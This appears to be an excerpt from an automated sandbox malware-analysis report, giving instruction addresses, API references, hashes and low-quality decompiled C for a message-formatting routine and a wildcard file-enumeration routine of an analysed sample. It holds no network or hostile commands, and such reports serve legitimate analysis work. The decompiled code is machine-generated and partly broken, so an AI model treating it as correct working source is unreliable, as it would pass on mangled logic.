0x0007a0c0
0x0007a0d1
0x0007a0d9
0x0007a0df
0x0007a0ed
0x0007a0f3
0x0007a104
0x0007a10a
0x0007a10c
0x0007a124
0x0007a12a
0x0007a12d
0x0007a13a
0x0007a141
0x0007a145
0x0007a149
0x0007a14d
0x0007a166
0x0007a171
0x0007a17d
0x0007a173
0x0007a173
0x0007a173
0x0007a183
0x0007a18f
0x0007a195
0x0007a195
0x0007a197
0x0007a1a3
0x0007a1a9
0x0007a1ab
0x0007a1b7
0x0007a1bd
0x0007a1bf
0x0007a1cb
0x0007a1d1
0x0007a1d5
0x0007a1d7
0x0007a1d7
0x0007a1d9
0x00000000
0x0007a1d9
0x0007a06e
0x0007a07a
0x0007a080
0x0007a080
0x0007a02a
0x0007a036
0x0007a03c
0x0007a03e
0x0007a03e
0x0007a000
0x0007a006
0x00000000
0x0007a006
0x00079fcd
0x00079f69
0x00079f6d
0x00079f71
0x00000000

APIs

Part of subcall function 00079DF1: GetDC.USER32(00000000), ref: 00079DF5
Part of subcall function 00079DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00079E00
Part of subcall function 00079DF1: ReleaseDC.USER32(00000000,00000000), ref: 00079E0B

GetObjectW.GDI32(?,00000018,?), ref: 00079F8D

Part of subcall function 0007A1E5: GetDC.USER32(00000000), ref: 0007A1EE
Part of subcall function 0007A1E5: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00079F7A,?,?,?), ref: 0007A21D
Part of subcall function 0007A1E5: ReleaseDC.USER32(00000000,?), ref: 0007A2B5

Strings

(, xrefs: 0007A0A3

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: d55d56bec378b5276141eb12e3d0ed29674148a4bd5d96deb2b7369c228a1782
Instruction ID: de94aff67aed89db386816c0f6eb2b5fff3ae234bc6afb0f231507f62b4a099e
Opcode Fuzzy Hash: d55d56bec378b5276141eb12e3d0ed29674148a4bd5d96deb2b7369c228a1782
Instruction Fuzzy Hash: C8810271608214AFD614DF68C844A2ABBE9FFC9704F00891EF98AD7260DB39AD05DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00070E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00070E37(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x72;
				if(_t47 > 0) {
					__eflags = _t26 - 0x80;
					if(_t26 == 0x80) {
						E0007CD24();
						_t28 = E0006DDD1(_t41, 0x96);
						return E00079F35( *0xa844c, E0006DDD1(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E0006DDD1(_t41));
						_push( *_t44);
						L19:
						_t32 = E0007AE88();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M000710FF))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E0006DDD1(__ecx, 0xc8) =  &_v516;
										__eax = E0006400A( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E0007AE88( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E0006DDD1(_t41);
							L7:
							_push(0);
							L8:
							return E0007AE88();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M000710A7))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E0007A5F8();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E0006DDD1(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E0006DDD1(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E0006DDD1(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}

0x00070e37
0x00070e41
0x00070e43
0x00070e46
0x00070e49
0x00071070
0x00071075
0x00071077
0x00071083
0x00000000
0x0007109a
0x00070e4f
0x00070e4f
0x00071066
0x00070f93
0x00070f98
0x00070f99
0x00070ed6
0x00070ed6
0x00070e9f
0x00000000
0x00070e9f
0x00070e55
0x00070e58
0x00070f58
0x00070f5b
0x0007101b
0x0007101b
0x0007101e
0x0007105c
0x00000000
0x0007105c
0x00071020
0x00071020
0x00071023
0x00071055
0x00000000
0x00071055
0x00071025
0x00071025
0x00071028
0x00071048
0x0007104b
0x00000000
0x0007104b
0x0007102a
0x0007102a
0x0007102d
0x0007103e
0x00000000
0x0007103e
0x0007102f
0x0007102f
0x00071032
0x00071034
0x00000000
0x00071034
0x00070f61
0x00070f61
0x00071014
0x00000000
0x00071014
0x00070f67
0x00070f6a
0x00070f6d
0x00070f73
0x00000000
0x00070f7a
0x00000000
0x00000000
0x00070f84
0x00000000
0x00000000
0x00070f8e
0x00000000
0x00000000
0x00070fa0
0x00000000
0x00000000
0x00070fa4
0x00000000
0x00000000
0x00070fa8
0x00070fab
0x00000000
0x00000000
0x00070fb2
0x00000000
0x00000000
0x00070fb9
0x00000000
0x00000000
0x00070fc0
0x00070fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00070fcd
0x00070fd0
0x00000000
0x00000000
0x00070fe5
0x00070ff1
0x00070ff6
0x00070ff9
0x00070fff
0x00000000
0x00000000
0x00070f73
0x00070f6d
0x00070e5e
0x00070e5e
0x00070f4f
0x00070f51
0x00070ef3
0x00070ef3
0x00070e7b
0x00070e7b
0x00070e7d
0x00000000
0x00070e82
0x00070e67
0x00070e6d
0x00000000
0x00070e8a
0x00070e8c
0x00070e91
0x00000000
0x00000000
0x00070e74
0x00070e76
0x00000000
0x00000000
0x00070e98
0x00070e9a
0x00000000
0x00000000
0x00070ea5
0x00070ea8
0x00000000
0x00000000
0x00070eb4
0x00070eb7
0x00000000
0x00000000
0x00070ebb
0x00070ebe
0x00000000
0x00000000
0x00070ec2
0x00070ec5
0x00000000
0x00000000
0x00070ecc
0x00070ece
0x00070ed3
0x00070ed4
0x00000000
0x00000000
0x00070ede
0x00070ee1
0x00000000
0x00000000
0x00070ee5
0x00070ee8
0x00000000
0x00000000
0x00070eec
0x00070eee
0x00000000
0x00000000
0x00070efb
0x00070efd
0x00000000
0x00000000
0x00070f04
0x00070f07
0x00000000
0x00000000
0x00070f0e
0x00070f11
0x00000000
0x00000000
0x00000000
0x00000000
0x00070f18
0x00070f1b
0x00070f23
0x00000000
0x00000000
0x00070f38
0x00070f3b
0x00000000
0x00000000
0x00070f42
0x00070f45
0x00070eaa
0x00070eaf
0x00070eb0
0x00000000
0x00000000
0x00070e6d
0x00070e67
0x00070e58
0x000710a3
0x000710a3

APIs

_swprintf.LIBCMT ref: 00070FF1

Strings

%ls, xrefs: 00070E76, 00070E8C
%s: %s, xrefs: 00071000

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: a58499f6c83bdb3d2454079c2b0bdd5cc904835a0e2ea7db966e9bb7a6c0780d
Instruction ID: da910094798e9ccf32fc5875badefb69155609aacac87a35136a44dc1b8a07bd
Opcode Fuzzy Hash: a58499f6c83bdb3d2454079c2b0bdd5cc904835a0e2ea7db966e9bb7a6c0780d
Instruction Fuzzy Hash: 5E51C771F8C700FEEA311AA4CD02F7E7656AB04B00F20CA16F79E648D2C6DE6590675E

Uniqueness

Uniqueness Score: -1.00%

Function 0008A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0008A918(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00087956(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0008E8A2(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00088849();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E000885A9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0008E8A2(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0008ACE7(_a12, _t193, __eflags, _t213);
													E000884DE(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0008E8A2(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00088849();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x9e668; // 0x136d1c5
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E0008E8F0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E0007F350(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00085A90(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0008A900);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0007EC4A(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E000884DE(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E0008E8B0( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0008ACC2( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E0008895A();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00088839();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x0008a91d
0x0008a920
0x0008a926
0x0008a93e
0x0008a941
0x0008a945
0x0008a947
0x0008a949
0x0008a94b
0x0008a94e
0x0008a951
0x0008a954
0x0008a956
0x0008a9ae
0x0008a9ae
0x0008a9b4
0x0008a9b6
0x0008a9c1
0x0008a9c5
0x0008a9c7
0x0008a9ca
0x0008a9ce
0x0008a9ce
0x0008a9d0
0x0008a9d2
0x0008a9d4
0x0008a9d6
0x0008a9d6
0x0008a9d8
0x0008a9db
0x0008a9de
0x0008a9de
0x0008a9e0
0x0008a9e1
0x0008a9e1
0x0008a9ec
0x0008a9ee
0x0008a9f1
0x0008a9f2
0x0008a9f5
0x0008a9f5
0x0008a9f9
0x0008a9fc
0x0008a9ff
0x0008a9ff
0x0008aa0d
0x0008aa0f
0x0008aa12
0x0008aa14
0x0008aa1e
0x0008aa21
0x0008aa24
0x0008aa26
0x0008aa29
0x0008aa2b
0x0008aa7b
0x0008aa7e
0x0008aa7e
0x0008aa80
0x00000000
0x0008aa2d
0x0008aa2f
0x0008aa2f
0x0008aa31
0x0008aa34
0x0008aa34
0x0008aa39
0x0008aa3c
0x0008aa3c
0x0008aa3e
0x0008aa3f
0x0008aa3f
0x0008aa43
0x0008aa46
0x0008aa46
0x0008aa49
0x0008aa4c
0x0008aa59
0x0008aa5e
0x0008aa61
0x0008aa63
0x0008aa9d
0x0008aa9e
0x0008aa9f
0x0008aaa0
0x0008aaa1
0x0008aaa2
0x0008aaa7
0x0008aaab
0x0008aaad
0x0008aaae
0x0008aab1
0x0008aab1
0x0008aab4
0x0008aab4
0x0008aab6
0x0008aab7
0x0008aab7
0x0008aac0
0x0008aac1
0x0008aac4
0x0008aac7
0x0008aaca
0x0008aacc
0x0008aad3
0x0008aad5
0x0008aad8
0x0008aae2
0x0008aae5
0x0008aae6
0x0008aae8
0x0008aafc
0x0008aafc
0x0008aaff
0x0008ab09
0x0008ab0e
0x0008ab11
0x0008ab13
0x00000000
0x0008ab15
0x0008ab19
0x0008ab22
0x0008ab28
0x00000000
0x0008ab2b
0x0008aaea
0x0008aaea
0x0008aaf0
0x0008aaf5
0x0008aaf8
0x0008aafa
0x0008ab31
0x0008ab33
0x0008ab34
0x0008ab35
0x0008ab36
0x0008ab37
0x0008ab38
0x0008ab3d
0x0008ab40
0x0008ab41
0x0008ab43
0x0008ab49
0x0008ab50
0x0008ab53
0x0008ab56
0x0008ab57
0x0008ab5a
0x0008ab5b
0x0008ab5e
0x0008ab5f
0x0008ab80
0x0008ab80
0x0008ab82
0x00000000
0x00000000
0x0008ab67
0x0008ab69
0x0008ab6b
0x0008ab6d
0x0008ab6f
0x0008ab71
0x0008ab73
0x0008ab7e
0x00000000
0x0008ab7e
0x0008ab73
0x0008ab6f
0x00000000
0x0008ab6b
0x0008ab84
0x0008ab86
0x0008ab89
0x0008aba2
0x0008aba2
0x0008aba4
0x0008aba7
0x0008abb7
0x0008abb9
0x0008abb9
0x0008aba9
0x0008aba9
0x0008abac
0x00000000
0x0008abae
0x0008abae
0x0008abb1
0x00000000
0x0008abb3
0x0008abb3
0x0008abb3
0x0008abb1
0x0008abac
0x0008abc7
0x0008abcb
0x0008abd9
0x0008abde
0x0008abf3
0x0008abf5
0x0008abfb
0x0008abfe
0x0008ac30
0x0008ac30
0x0008ac35
0x0008ac3b
0x0008ac3b
0x0008ac42
0x0008ac5c
0x0008ac5c
0x0008ac5d
0x0008ac63
0x0008ac69
0x0008ac6a
0x0008ac6b
0x0008ac70
0x0008ac73
0x0008ac75
0x00000000
0x00000000
0x00000000
0x00000000
0x0008ac44
0x0008ac44
0x0008ac4a
0x0008ac4c
0x00000000
0x0008ac4e
0x0008ac4e
0x0008ac51
0x00000000
0x0008ac53
0x0008ac53
0x0008ac5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0008ac5a
0x0008ac51
0x0008ac4c
0x00000000
0x0008ac77
0x0008ac7f
0x0008ac85
0x0008ac87
0x0008ac87
0x0008ac8f
0x0008ac94
0x0008ac9c
0x0008ac9f
0x0008aca1
0x0008acb5
0x0008acba
0x0008ac00
0x0008ac00
0x0008ac01
0x0008ac02
0x0008ac03
0x0008ac04
0x0008ac0c
0x0008ac0c
0x0008ac0c
0x0008ac0e
0x0008ac11
0x0008ac14
0x0008ac14
0x0008ab8b
0x0008ab8e
0x0008ab90
0x00000000
0x0008ab92
0x0008ab92
0x0008ab95
0x0008ab96
0x0008ab97
0x0008ab98
0x0008ab9d
0x0008ab90
0x0008ac1c
0x0008ac21
0x0008ac2c
0x00000000
0x00000000
0x00000000
0x0008aafa
0x0008aace
0x0008aad0
0x0008ab2c
0x0008ab30
0x0008ab30
0x00000000
0x00000000
0x00000000
0x00000000
0x0008aa65
0x0008aa68
0x0008aa6b
0x0008aa6e
0x0008aa71
0x0008aa74
0x0008aa77
0x0008aa77
0x00000000
0x0008aa34
0x0008aa16
0x0008aa16
0x0008aa82
0x0008aa84
0x00000000
0x0008aa89
0x0008a958
0x0008a958
0x0008a95b
0x0008a964
0x0008a967
0x0008a96e
0x0008a970
0x0008a989
0x0008a98a
0x0008a98b
0x0008a98d
0x0008a992
0x0008a972
0x0008a972
0x0008a975
0x0008a976
0x0008a978
0x0008a97a
0x0008a97c
0x0008a981
0x0008a981
0x0008a995
0x0008a997
0x0008a999
0x00000000
0x00000000
0x0008a99f
0x0008a9a2
0x0008a9a4
0x0008a9a6
0x00000000
0x0008a9a8
0x0008a9a8
0x0008a9ab
0x00000000
0x0008a9ab
0x00000000
0x0008a9a6
0x0008aa8a
0x0008aa8d
0x0008aa92
0x00000000
0x0008aa95
0x0008a928
0x0008a928
0x0008a92f
0x0008a930
0x0008a932
0x0008a937
0x0008aa96
0x0008aa9a
0x0008aa9a
0x00000000

APIs

_free.LIBCMT ref: 0008AA84

Part of subcall function 00088849: IsProcessorFeaturePresent.KERNEL32(00000017,00088838,00000050,00093958,?,0006CFE0,00000004,000A0EE8,?,?,00088845,00000000,00000000,00000000,00000000,00000000), ref: 0008884B
Part of subcall function 00088849: GetCurrentProcess.KERNEL32(C0000417,00093958,00000050,000A0EE8), ref: 0008886D
Part of subcall function 00088849: TerminateProcess.KERNEL32(00000000), ref: 00088874

Strings

*?, xrefs: 0008A95B
., xrefs: 0008AC3B

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
